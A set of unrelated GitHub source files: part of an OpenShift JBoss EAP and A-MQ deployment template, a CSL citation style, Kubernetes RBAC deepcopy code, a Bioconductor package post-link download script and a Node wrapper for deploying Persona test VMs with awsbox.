Factory JNDI Name", "description": "JNDI name for connection factory used by applications to connect to the broker, e.g. java:/ConnectionFactory", "name": "MQ_JNDI", "value": "java:/ConnectionFactory", "required": false }, { "displayName": "Split Data?", "description": "Split the data directory for each node in a mesh.", "name": "AMQ_SPLIT", "value": "false", "required": false }, { "displayName": "A-MQ Protocols", "description": "Broker protocols to configure, separated by commas. Allowed values are: `openwire`, `amqp`, `stomp` and `mqtt`. 
Only `openwire` is supported by EAP.", "name": "MQ_PROTOCOL", "value": "openwire", "required": false }, { "displayName": "Queues", "description": "Queue names, separated by commas. These queues will be automatically created when the broker starts. Also, they will be made accessible as JNDI resources in EAP.", "name": "MQ_QUEUES", "value": "HELLOWORLDMDBQueue", "required": false }, { "displayName": "Topics", "description": "Topic names, separated by commas. These topics will be automatically created when the broker starts. Also, they will be made accessible as JNDI resources in EAP.", "name": "MQ_TOPICS", "value": "HELLOWORLDMDBTopic", "required": false }, { "displayName": "A-MQ Serializable Packages", "description": "List of packages that are allowed to be serialized for use in ObjectMessage, separated by commas. If your app doesn't use ObjectMessages, leave this blank. This is a security enforcement. For the rationale, see http://activemq.apache.org/objectmessage.html", "name": "MQ_SERIALIZABLE_PACKAGES", "value": "", "required": false }, { "displayName": "Server Keystore Secret Name", "description": "The name of the secret containing the keystore file", "name": "HTTPS_SECRET", "value": "eap-app-secret", "required": false }, { "displayName": "Server Keystore Filename", "description": "The name of the keystore file within the secret", "name": "HTTPS_KEYSTORE", "value": "keystore.jks", "required": false }, { "displayName": "Server Keystore Type", "description": "The type of the keystore file (JKS or JCEKS)", "name": "HTTPS_KEYSTORE_TYPE", "value": "", "required": false }, { "displayName": "Server Certificate Name", "description": "The name associated with the server certificate", "name": "HTTPS_NAME", "value": "", "required": false }, { "displayName": "Server Keystore Password", "description": "The password for the keystore and certificate", "name": "HTTPS_PASSWORD", "value": "", "required": false }, { "displayName": "A-MQ Username", "description": "User name for standard broker user. It is required for connecting to the broker. If left empty, it will be generated.", "name": "MQ_USERNAME", "from": "user[a-zA-Z0-9]{3}", "generate": "expression", "required": false }, { "displayName": "A-MQ Password", "description": "Password for standard broker user. It is required for connecting to the broker. If left empty, it will be generated.", "name": "MQ_PASSWORD", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": false }, { "displayName": "A-MQ Mesh Discovery Type", "description": "The discovery agent type to use for discovering mesh endpoints. 'dns' will use OpenShift's DNS service to resolve endpoints. 'kube' will use Kubernetes REST API to resolve service endpoints. 
If using 'kube' the service account for the pod must have the 'view' role, which can be added via 'oc policy add-role-to-user view system:serviceaccount:<namespace>:default' where <namespace> is the project namespace.", "name": "AMQ_MESH_DISCOVERY_TYPE", "value": "dns", "required": false }, { "displayName": "A-MQ Storage Limit", "description": "The A-MQ storage usage limit", "name": "AMQ_STORAGE_USAGE_LIMIT", "value": "100 gb", "required": false }, { "displayName": "Github Webhook Secret", "description": "GitHub trigger secret", "name": "GITHUB_WEBHOOK_SECRET", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "Generic Webhook Secret", "description": "Generic build trigger secret", "name": "GENERIC_WEBHOOK_SECRET", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "ImageStream Namespace", "description": "Namespace in which the ImageStreams for Red Hat Middleware images are installed. These ImageStreams are normally installed in the openshift namespace. You should only need to modify this if you've installed the ImageStreams in a different namespace/project.", "name": "IMAGE_STREAM_NAMESPACE", "value": "openshift", "required": true }, { "displayName": "JGroups Secret Name", "description": "The name of the secret containing the keystore file", "name": "JGROUPS_ENCRYPT_SECRET", "value": "eap-app-secret", "required": false }, { "displayName": "JGroups Keystore Filename", "description": "The name of the keystore file within the secret", "name": "JGROUPS_ENCRYPT_KEYSTORE", "value": "jgroups.jceks", "required": false }, { "displayName": "JGroups Certificate Name", "description": "The name associated with the server certificate", "name": "JGROUPS_ENCRYPT_NAME", "value": "", "required": false }, { "displayName": "JGroups Keystore Password", "description": "The password for the keystore and certificate", "name": "JGROUPS_ENCRYPT_PASSWORD", "value": "", "required": false }, { "displayName": "JGroups Cluster Password", "description": "JGroups cluster password", "name": "JGROUPS_CLUSTER_PASSWORD", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "Deploy Exploded Archives", "description": "Controls whether exploded deployment content should be automatically deployed", "name": "AUTO_DEPLOY_EXPLODED", "value": "false", "required": false }, { "displayName": "Maven mirror URL", "description": "Maven mirror to use for S2I builds", "name": "MAVEN_MIRROR_URL", "value": "", "required": false }, { "description": "List of directories from which archives will be copied into the deployment folder. 
If unspecified, all archives in /target will be copied.", "name": "ARTIFACT_DIR", "value": "", "required": false }, { "description": "Container memory limit", "name": "MEMORY_LIMIT", "value": "1Gi", "required": false } ], "objects": [ { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 8080, "targetPort": 8080 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The web server's HTTP port.", "service.alpha.openshift.io/dependencies": "[{\"name\": \"${APPLICATION_NAME}-amq-tcp\", \"kind\": \"Service\"}]" } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 8443, "targetPort": 8443 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "secure-${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The web server's HTTPS port.", "service.alpha.openshift.io/dependencies": "[{\"name\": \"${APPLICATION_NAME}-amq-tcp\", \"kind\": \"Service\"}]" } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "clusterIP": "None", "ports": [ { "name": "ping", "port": 8888 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "${APPLICATION_NAME}-ping", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "service.alpha.kubernetes.io/tolerate-unready-endpoints": "true", "description": "The JGroups ping port for clustering." } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 61616, "targetPort": 61616 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" } }, "metadata": { "name": "${APPLICATION_NAME}-amq-tcp", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The broker's OpenWire port." } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "clusterIP": "None", "ports": [ { "name": "mesh", "port": 61616 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" } }, "metadata": { "name": "${APPLICATION_NAME}-amq-mesh", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "service.alpha.kubernetes.io/tolerate-unready-endpoints": "true", "description": "Supports node discovery for mesh formation." } } }, { "kind": "Route", "apiVersion": "v1", "id": "${APPLICATION_NAME}-http", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "Route for application's HTTP service." } }, "spec": { "host": "${HOSTNAME_HTTP}", "to": { "name": "${APPLICATION_NAME}" } } }, { "kind": "Route", "apiVersion": "v1", "id": "${APPLICATION_NAME}-https", "metadata": { "name": "secure-${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "Route for application's HTTPS service." 
} }, "spec": { "host": "${HOSTNAME_HTTPS}", "to": { "name": "secure-${APPLICATION_NAME}" }, "tls": { "termination": "passthrough" } } }, { "kind": "ImageStream", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } } }, { "kind": "BuildConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "source": { "type": "Git", "git": { "uri": "${SOURCE_REPOSITORY_URL}", "ref": "${SOURCE_REPOSITORY_REF}" }, "contextDir": "${CONTEXT_DIR}" }, "strategy": { "type": "Source", "sourceStrategy": { "env": [ { "name": "MAVEN_MIRROR_URL", "value": "${MAVEN_MIRROR_URL}" }, { "name": "ARTIFACT_DIR", "value": "${ARTIFACT_DIR}" } ], "forcePull": true, "from": { "kind": "ImageStreamTag", "namespace": "${IMAGE_STREAM_NAMESPACE}", "name": "jboss-eap64-openshift:1.7" } } }, "output": { "to": { "kind": "ImageStreamTag", "name": "${APPLICATION_NAME}:latest" } }, "triggers": [ { "type": "GitHub", "github": { "secret": "${GITHUB_WEBHOOK_SECRET}" } }, { "type": "Generic", "generic": { "secret": "${GENERIC_WEBHOOK_SECRET}" } }, { "type": "ImageChange", "imageChange": {} }, { "type": "ConfigChange" } ] } }, { "kind": "DeploymentConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "strategy": { "type": "Recreate" }, "triggers": [ { "type": "ImageChange", "imageChangeParams": { "automatic": true, "containerNames": [ "${APPLICATION_NAME}" ], "from": { "kind": "ImageStreamTag", "name": "${APPLICATION_NAME}:latest" } } }, { "type": "ConfigChange" } ], "replicas": 1, "selector": { "deploymentConfig": "${APPLICATION_NAME}" }, "template": { "metadata": { "name": "${APPLICATION_NAME}", "labels": { "deploymentConfig": "${APPLICATION_NAME}", "application": "${APPLICATION_NAME}" } }, "spec": { "terminationGracePeriodSeconds": 60, "containers": [ { "name": "${APPLICATION_NAME}", "image": "${APPLICATION_NAME}", "imagePullPolicy": "Always", "resources": { "limits": { "memory": "${MEMORY_LIMIT}" } }, "volumeMounts": [ { "name": "eap-keystore-volume", "mountPath": "/etc/eap-secret-volume", "readOnly": true }, { "name": "eap-jgroups-keystore-volume", "mountPath": "/etc/jgroups-encrypt-secret-volume", "readOnly": true } ], "livenessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/eap/bin/livenessProbe.sh" ] }, "initialDelaySeconds": 60 }, "readinessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/eap/bin/readinessProbe.sh" ] } }, "ports": [ { "name": "jolokia", "containerPort": 8778, "protocol": "TCP" }, { "name": "http", "containerPort": 8080, "protocol": "TCP" }, { "name": "https", "containerPort": 8443, "protocol": "TCP" }, { "name": "ping", "containerPort": 8888, "protocol": "TCP" } ], "env": [ { "name": "MQ_SERVICE_PREFIX_MAPPING", "value": "${APPLICATION_NAME}-amq=MQ" }, { "name": "MQ_JNDI", "value": "${MQ_JNDI}" }, { "name": "MQ_USERNAME", "value": "${MQ_USERNAME}" }, { "name": "MQ_PASSWORD", "value": "${MQ_PASSWORD}" }, { "name": "MQ_PROTOCOL", "value": "tcp" }, { "name": "MQ_QUEUES", "value": "${MQ_QUEUES}" }, { "name": "MQ_TOPICS", "value": "${MQ_TOPICS}" }, { "name": "MQ_SERIALIZABLE_PACKAGES", "value": "${MQ_SERIALIZABLE_PACKAGES}" }, { "name": "JGROUPS_PING_PROTOCOL", "value": "openshift.DNS_PING" }, { "name": "OPENSHIFT_DNS_PING_SERVICE_NAME", "value": "${APPLICATION_NAME}-ping" }, { "name": "OPENSHIFT_DNS_PING_SERVICE_PORT", "value": "8888" }, { "name": "HTTPS_KEYSTORE_DIR", "value": 
"/etc/eap-secret-volume" }, { "name": "HTTPS_KEYSTORE", "value": "${HTTPS_KEYSTORE}" }, { "name": "HTTPS_KEYSTORE_TYPE", "value": "${HTTPS_KEYSTORE_TYPE}" }, { "name": "HTTPS_NAME", "value": "${HTTPS_NAME}" }, { "name": "HTTPS_PASSWORD", "value": "${HTTPS_PASSWORD}" }, { "name": "JGROUPS_ENCRYPT_SECRET", "value": "${JGROUPS_ENCRYPT_SECRET}" }, { "name": "JGROUPS_ENCRYPT_KEYSTORE_DIR", "value": "/etc/jgroups-encrypt-secret-volume" }, { "name": "JGROUPS_ENCRYPT_KEYSTORE", "value": "${JGROUPS_ENCRYPT_KEYSTORE}" }, { "name": "JGROUPS_ENCRYPT_NAME", "value": "${JGROUPS_ENCRYPT_NAME}" }, { "name": "JGROUPS_ENCRYPT_PASSWORD", "value": "${JGROUPS_ENCRYPT_PASSWORD}" }, { "name": "JGROUPS_CLUSTER_PASSWORD", "value": "${JGROUPS_CLUSTER_PASSWORD}" }, { "name": "AUTO_DEPLOY_EXPLODED", "value": "${AUTO_DEPLOY_EXPLODED}" } ] } ], "volumes": [ { "name": "eap-keystore-volume", "secret": { "secretName": "${HTTPS_SECRET}" } }, { "name": "eap-jgroups-keystore-volume", "secret": { "secretName": "${JGROUPS_ENCRYPT_SECRET}" } } ] } } } }, { "kind": "DeploymentConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}-amq", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "strategy": { "type": "Rolling", "rollingParams": { "maxSurge": 0 } }, "triggers": [ { "type": "ImageChange", "imageChangeParams": { "automatic": true, "containerNames": [ "${APPLICATION_NAME}-amq" ], "from": { "kind": "ImageStreamTag", "namespace": "${IMAGE_STREAM_NAMESPACE}", "name": "jboss-amq-62:1.7" } } }, { "type": "ConfigChange" } ], "replicas": 1, "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" }, "template": { "metadata": { "name": "${APPLICATION_NAME}-amq", "labels": { "deploymentConfig": "${APPLICATION_NAME}-amq", "application": "${APPLICATION_NAME}" } }, "spec": { "terminationGracePeriodSeconds": 60, "containers": [ { "name": "${APPLICATION_NAME}-amq", "image": "jboss-amq-62", "imagePullPolicy": "Always", "readinessProbe": { "exec": { "command": [ "/bin/bash", "-c", "/opt/amq/bin/readinessProbe.sh" ] } }, "ports": [ { "name": "jolokia", "containerPort": 8778, "protocol": "TCP" }, { "name": "amqp", "containerPort": 5672, "protocol": "TCP" }, { "name": "amqp-ssl", "containerPort": 5671, "protocol": "TCP" }, { "name": "mqtt", "containerPort": 1883, "protocol": "TCP" }, { "name": "stomp", "containerPort": 61613, "protocol": "TCP" }, { "name": "stomp-ssl", "containerPort": 61612, "protocol": "TCP" }, { "name": "tcp", "containerPort": 61616, "protocol": "TCP" }, { "name": "tcp-ssl", "containerPort": 61617, "protocol": "TCP" } ], "volumeMounts": [ { "mountPath": "/opt/amq/data/kahadb", "name": "${APPLICATION_NAME}-amq-pvol" } ], "env": [ { "name": "AMQ_USER", "value": "${MQ_USERNAME}" }, { "name": "AMQ_PASSWORD", "value": "${MQ_PASSWORD}" }, { "name": "AMQ_TRANSPORTS", "value": "${MQ_PROTOCOL}" }, { "name": "AMQ_QUEUES", "value": "${MQ_QUEUES}" }, { "name": "AMQ_TOPICS", "value": "${MQ_TOPICS}" }, { "name": "MQ_SERIALIZABLE_PACKAGES", "value": "${MQ_SERIALIZABLE_PACKAGES}" }, { "name": "AMQ_SPLIT", "value": "${AMQ_SPLIT}" }, { "name": "AMQ_MESH_DISCOVERY_TYPE", "value": "${AMQ_MESH_DISCOVERY_TYPE}" }, { "name": "AMQ_MESH_SERVICE_NAME", "value": "${APPLICATION_NAME}-amq-mesh" }, { "name": "AMQ_MESH_SERVICE_NAMESPACE", "valueFrom": { "fieldRef": { "fieldPath": "metadata.namespace" } } }, { "name": "AMQ_STORAGE_USAGE_LIMIT", "value": "${AMQ_STORAGE_USAGE_LIMIT}" } ] } ], "volumes": [ { "name": "${APPLICATION_NAME}-amq-pvol", "persistentVolumeClaim": { "claimName": "${APPLICATION_NAME}-amq-claim" } } ] } 
} } }, { "apiVersion": "v1", "kind": "PersistentVolumeClaim", "metadata": { "name": "${APPLICATION_NAME}-amq-claim", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "accessModes": [ "ReadWriteOnce" ], "resources": { "requests": { "storage": "${VOLUME_CAPACITY}" } } } } ] }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?>
<style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US">
  <!-- Elsevier, generated from "elsevier" metadata at https://github.com/citation-style-language/journals -->
  <info>
    <title>Journal of Water Process Engineering</title>
    <id>http://www.zotero.org/styles/journal-of-water-process-engineering</id>
    <link href="http://www.zotero.org/styles/journal-of-water-process-engineering" rel="self"/>
    <link href="http://www.zotero.org/styles/elsevier-with-titles" rel="independent-parent"/>
    <category citation-format="numeric"/>
    <issn>2214-7144</issn>
    <updated>2018-02-16T12:00:00+00:00</updated>
    <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights>
  </info>
</style>
{ "pile_set_name": "Github" }
// +build !ignore_autogenerated /* Copyright The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by deepcopy-gen. DO NOT EDIT. package v1beta1 import ( v1 "k8s.io/apimachinery/pkg/apis/meta/v1" runtime "k8s.io/apimachinery/pkg/runtime" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *AggregationRule) DeepCopyInto(out *AggregationRule) { *out = *in if in.ClusterRoleSelectors != nil { in, out := &in.ClusterRoleSelectors, &out.ClusterRoleSelectors *out = make([]v1.LabelSelector, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new AggregationRule. func (in *AggregationRule) DeepCopy() *AggregationRule { if in == nil { return nil } out := new(AggregationRule) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRole) DeepCopyInto(out *ClusterRole) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Rules != nil { in, out := &in.Rules, &out.Rules *out = make([]PolicyRule, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } if in.AggregationRule != nil { in, out := &in.AggregationRule, &out.AggregationRule if *in == nil { *out = nil } else { *out = new(AggregationRule) (*in).DeepCopyInto(*out) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRole. func (in *ClusterRole) DeepCopy() *ClusterRole { if in == nil { return nil } out := new(ClusterRole) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRole) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRoleBinding) DeepCopyInto(out *ClusterRoleBinding) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Subjects != nil { in, out := &in.Subjects, &out.Subjects *out = make([]Subject, len(*in)) copy(*out, *in) } out.RoleRef = in.RoleRef return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleBinding. func (in *ClusterRoleBinding) DeepCopy() *ClusterRoleBinding { if in == nil { return nil } out := new(ClusterRoleBinding) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleBinding) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *ClusterRoleBindingList) DeepCopyInto(out *ClusterRoleBindingList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterRoleBinding, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleBindingList. func (in *ClusterRoleBindingList) DeepCopy() *ClusterRoleBindingList { if in == nil { return nil } out := new(ClusterRoleBindingList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleBindingList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterRoleList) DeepCopyInto(out *ClusterRoleList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterRole, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterRoleList. func (in *ClusterRoleList) DeepCopy() *ClusterRoleList { if in == nil { return nil } out := new(ClusterRoleList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterRoleList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *PolicyRule) DeepCopyInto(out *PolicyRule) { *out = *in if in.Verbs != nil { in, out := &in.Verbs, &out.Verbs *out = make([]string, len(*in)) copy(*out, *in) } if in.APIGroups != nil { in, out := &in.APIGroups, &out.APIGroups *out = make([]string, len(*in)) copy(*out, *in) } if in.Resources != nil { in, out := &in.Resources, &out.Resources *out = make([]string, len(*in)) copy(*out, *in) } if in.ResourceNames != nil { in, out := &in.ResourceNames, &out.ResourceNames *out = make([]string, len(*in)) copy(*out, *in) } if in.NonResourceURLs != nil { in, out := &in.NonResourceURLs, &out.NonResourceURLs *out = make([]string, len(*in)) copy(*out, *in) } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new PolicyRule. func (in *PolicyRule) DeepCopy() *PolicyRule { if in == nil { return nil } out := new(PolicyRule) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *Role) DeepCopyInto(out *Role) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Rules != nil { in, out := &in.Rules, &out.Rules *out = make([]PolicyRule, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new Role. func (in *Role) DeepCopy() *Role { if in == nil { return nil } out := new(Role) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. 
func (in *Role) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleBinding) DeepCopyInto(out *RoleBinding) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) if in.Subjects != nil { in, out := &in.Subjects, &out.Subjects *out = make([]Subject, len(*in)) copy(*out, *in) } out.RoleRef = in.RoleRef return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleBinding. func (in *RoleBinding) DeepCopy() *RoleBinding { if in == nil { return nil } out := new(RoleBinding) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleBinding) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleBindingList) DeepCopyInto(out *RoleBindingList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]RoleBinding, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleBindingList. func (in *RoleBindingList) DeepCopy() *RoleBindingList { if in == nil { return nil } out := new(RoleBindingList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleBindingList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleList) DeepCopyInto(out *RoleList) { *out = *in out.TypeMeta = in.TypeMeta out.ListMeta = in.ListMeta if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]Role, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleList. func (in *RoleList) DeepCopy() *RoleList { if in == nil { return nil } out := new(RoleList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *RoleList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RoleRef) DeepCopyInto(out *RoleRef) { *out = *in return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RoleRef. func (in *RoleRef) DeepCopy() *RoleRef { if in == nil { return nil } out := new(RoleRef) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *Subject) DeepCopyInto(out *Subject) { *out = *in return } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new Subject. func (in *Subject) DeepCopy() *Subject { if in == nil { return nil } out := new(Subject) in.DeepCopyInto(out) return out }
{ "pile_set_name": "Github" }
#include "qtoolbutton.h"
{ "pile_set_name": "Github" }
#!/bin/bash
FN="MeSH.Nle.eg.db_1.13.0.tar.gz"
URLS=(
  "https://bioconductor.org/packages/3.11/data/annotation/src/contrib/MeSH.Nle.eg.db_1.13.0.tar.gz"
  "https://bioarchive.galaxyproject.org/MeSH.Nle.eg.db_1.13.0.tar.gz"
  "https://depot.galaxyproject.org/software/bioconductor-mesh.nle.eg.db/bioconductor-mesh.nle.eg.db_1.13.0_src_all.tar.gz"
  "https://depot.galaxyproject.org/software/bioconductor-mesh.nle.eg.db/bioconductor-mesh.nle.eg.db_1.13.0_src_all.tar.gz"
)
MD5="b3f6e100e363d4aa7696c9a85edb94c4"

# Use a staging area in the conda dir rather than temp dirs, both to avoid
# permission issues as well as to have things downloaded in a predictable
# manner.
STAGING=$PREFIX/share/$PKG_NAME-$PKG_VERSION-$PKG_BUILDNUM
mkdir -p $STAGING
TARBALL=$STAGING/$FN
SUCCESS=0
for URL in ${URLS[@]}; do
  curl $URL > $TARBALL
  [[ $? == 0 ]] || continue

  # Platform-specific md5sum checks.
  if [[ $(uname -s) == "Linux" ]]; then
    if md5sum -c <<<"$MD5  $TARBALL"; then
      SUCCESS=1
      break
    fi
  else if [[ $(uname -s) == "Darwin" ]]; then
    if [[ $(md5 $TARBALL | cut -f4 -d " ") == "$MD5" ]]; then
      SUCCESS=1
      break
    fi
  fi
  fi
done

if [[ $SUCCESS != 1 ]]; then
  echo "ERROR: post-link.sh was unable to download any of the following URLs with the md5sum $MD5:"
  printf '%s\n' "${URLS[@]}"
  exit 1
fi

# Install and clean up
R CMD INSTALL --library=$PREFIX/lib/R/library $TARBALL
rm $TARBALL
rmdir $STAGING
{ "pile_set_name": "Github" }
#!/usr/bin/env node

/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

var path = require('path'),
    child_process = require('child_process');

/*
 * A thin wrapper around awsbox that expects certain env
 * vars and invokes awsbox for ya to deploy a VM.
 */

if (!process.env['AWS_ID'] || !process.env['AWS_SECRET']) {
  console.log("You haven't defined AWS_ID and AWS_SECRET in the environment");
  console.log("Get these values from the amazon web console and try again.");
  process.exit(1);
}

var cmd = path.join(__dirname, '..', 'node_modules', '.bin', 'awsbox');
cmd = path.relative(process.env['PWD'], cmd);

if (['create', 'deploy'].indexOf(process.argv[2]) !== -1) {
  var options = {};

  if (process.argv.length > 3) options.n = process.argv[3];

  if (process.env['PERSONA_SSL_PRIV'] || process.env['PERSONA_SSL_PUB']) {
    options.p = process.env['PERSONA_SSL_PUB'];
    options.s = process.env['PERSONA_SSL_PRIV'];
  }

  // DNS is done with Route53, so if you have AWS keys, you get DNS (assuming
  // your Route53 is authoritative for the domain you choose).
  options.d = true;

  var scheme = (options.p ? 'https' : 'http') + '://';
  if (process.env['PERSONA_DEPLOYMENT_HOSTNAME']) {
    options.u = scheme + process.env['PERSONA_DEPLOYMENT_HOSTNAME'];
  } else if (options.n) {
    var domain = process.env['PERSONA_DEPLOYMENT_DOMAIN'] || ".personatest.org";
    options.u = scheme + options.n + domain;
  }

  // pass through/override with user provided vars
  for (var i = 3; i < process.argv.length; i++) {
    var k = process.argv[i];
    if (i + 1 < process.argv.length && k.length === 2 && k[0] === '-') {
      options[k[1]] = process.argv[++i];
    }
  }

  if (process.env['PERSONA_EPHEMERAL_CONFIG']) {
    options.x = process.env['PERSONA_EPHEMERAL_CONFIG'];
  }

  cmd += " create --ssl=force";
  Object.keys(options).forEach(function(opt) {
    cmd += " -" + opt;
    cmd += typeof options[opt] === 'string' ? " " + options[opt] : "";
  });
} else {
  // Otherwise, pass through args to awsbox
  cmd += " " + process.argv.slice(2).join(' ');
}

console.log("awsbox cmd: " + cmd);

var cp = child_process.exec(cmd, function(err) {
  if (err) process.exit(err.code);
  else process.exit(0);
});

cp.stdout.pipe(process.stdout);
cp.stderr.pipe(process.stderr);
{ "pile_set_name": "Github" }
